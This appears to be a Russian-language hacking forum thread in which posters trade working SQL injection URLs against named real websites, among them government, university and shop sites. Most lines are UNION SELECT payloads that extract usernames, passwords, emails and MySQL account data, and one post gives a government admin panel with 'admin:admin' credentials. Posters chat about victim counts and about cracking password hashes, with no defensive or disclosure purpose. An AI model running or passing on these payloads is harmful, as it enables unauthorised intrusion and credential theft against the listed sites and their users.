Code: http://www.ecom-info.spb.ru/about/print.php?id=-156+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18,19,20,21,22,22,23,24,25+from+information_schema.tables+limit+41,41/*
Code: http://wmsu.edu.ph/v04.0i/news2.php?id=-46+union+select+concat(username,0x3a,password),2,3+from+users/* Code: http://www.taguig.gov.ph/bidding.php?ID=-2+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9,10,11,12,13,14,15,16,17/* Code: http://vryeafrikaan.co.za/lees.php?id=-610%20UNION%20SELECT%201,2,concat(username,0x3a,password),4,5,6,7,8,9+from+users/*
http://www.taguig.gov.ph/bidding.php?ID=-2+union+select+1,2,3,4,convert(concat(Blurbid,char(58),Blurbname)+using+latin1),6,7,8,9,10,11,12,13,14,15,16,17+from+Blurb/* http://www.taguig.gov.ph/admin/ admin:admin ps это не лечиться =\
Code: http://event.zontik.ru/?cat=30'+union+select+1,2,3,4,5,6,7,8,9,VERSION(),DATABASE(),12,13,14,15,16,17,18,19,20/* ЗЫ сервант часто вырубают(
так все очень аккуратно... Code: http://www.smeda.org/main.php?id=-192+union+select+1,concat_ws(char(58),user(),database(),version()),concat(user,char(58),password),4,5,6,7+from+mysql.user/*
Code: http://www.xgamestation.com/view_product.php?id=-1+union+select+1,concat(email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user+limit+0,1/* тому, кто скажет, что за алгоритм, дам +5 =) 11к юзеров) Code: http://trimm.ru/php/content.php?group=3&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* не подобрал таблицу =\ лень.
Code: http://www.regulator-nhsft.gov.uk/news.php?id=-947+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* Code: http://www.netpokerinfo.com/print.php?what=news&id=-25+union+select+1,2,version(),4,5,6,7,8,9,10,11,12/* Code: http://www.hispanicprwire.com/news.php?l=in&id=-5742+union+select+1,2,3,4,5,6,7,8,9/*
Code: _http://www.ksu.ru/podrobnee.php?id=-1+union+select+1,2,3,4,user(),version(),7,8,9,10,11/* тут х.е.з - вроде есть, но количество колонок не подобрал Code: _http://www.railpictures.net/viewphoto.php?id=147766-1 _http://www.railpictures.net/viewphoto.php?id=147765 _http://www.railpictures.net/viewphoto.php?id=147765' тут вроде обнаруживает попытку sql-inj и сессию убивает Code: _http://www.islamkent.com/modules.php?name=Hikaye&op=showcontent&id=-19+union+select+1/*
Code: http://shop.camillanorrback.com/show_product.php?id=-25+union+select+1,version(),3,4,5,6,7,8,9/*
Code: http://www.kondo-net.gr.jp/it/product_info.php?h=1' Code: http://www.lovely.ne.jp/amazononline/browse.php?c=1' Code: http://www.fresh-field.co.jp/parts/frparts.php?Pno=27&Pnum=20' немного японцев) =)
Code: http://82.149.168.178/friwoportal/main.php?id=11&lg=1&newsid=-244+union+select+1,2,3,concat_ws(char(58),user(),database(),version()),5,6,7,8,9,10,11,12+from+mysql.user/*
Code: http://www.tablehockey.ru/news.shtml?id=-1052+union+select+1,2,3,user(),database(),version(),7,8/*&bs=82&bc=20
www.fm.gov.lv Ниче не понятно, толи не выводит толи хз. Code: http://www.fm.gov.lv/search.php?id=-1+union+select+1/*
2Ksander Нет там скули... _http://www.fm.gov.lv/search.php?id=2 и _http://www.fm.gov.lv/search.php?id=3-1 отличаются
Code: http://selo.bg/news_details.php?id=-889+union+select+1,2,convert(version()%20using%20cp1251),4,5,6,7,8,9/*&lang=bg http://www.gramis.com/novina.php?id=-6%20UNION%20SELECT%201,2,3,concat(username,0x3a,password),5+from+users/* http://www.gramis.com/admin/ http://www.verticalworld.net/news/news.php?id=-419+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+limit+3,1/*
www.regenwald.org Code: http://www.regenwald.org/news.php?id=-1+union+select+1,2,3,version(),database(),user(),7,8,9,10,11,12,13,14/*
